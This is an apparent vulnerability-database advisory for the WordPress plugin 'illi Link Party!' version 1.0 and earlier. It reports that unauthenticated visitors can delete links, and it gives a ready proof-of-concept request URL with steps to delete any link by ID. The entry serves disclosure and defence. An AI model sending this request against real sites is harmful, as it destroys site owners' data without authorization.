Lucene search

K
wpexploitBob MatyasWPEX-ID:797692CE-F355-4D4A-AF01-4BD9ABC60A34
HistoryJan 23, 2024 - 12:00 a.m.

illi Link Party! <= 1.0 - Unauthenticated Arbitrary Link Deletion

2024-01-2300:00:00
Bob Matyas
28
unauthenticated access
arbitrary deletion
illi link party

9.6 High

AI Score

Confidence

High

0 Low

EPSS

Percentile

0.0%

Description The plugin lacks proper access controls, allowing unauthenticated visitors to delete links.

http://example.com/?page=illi3/includes/functions.php&action=delete_submission&id=INSERT_ID

Replace "INSERT_ID" with an ID of a link and hit enter. The link will be deleted.

9.6 High

AI Score

Confidence

High

0 Low

EPSS

Percentile

0.0%

Related for WPEX-ID:797692CE-F355-4D4A-AF01-4BD9ABC60A34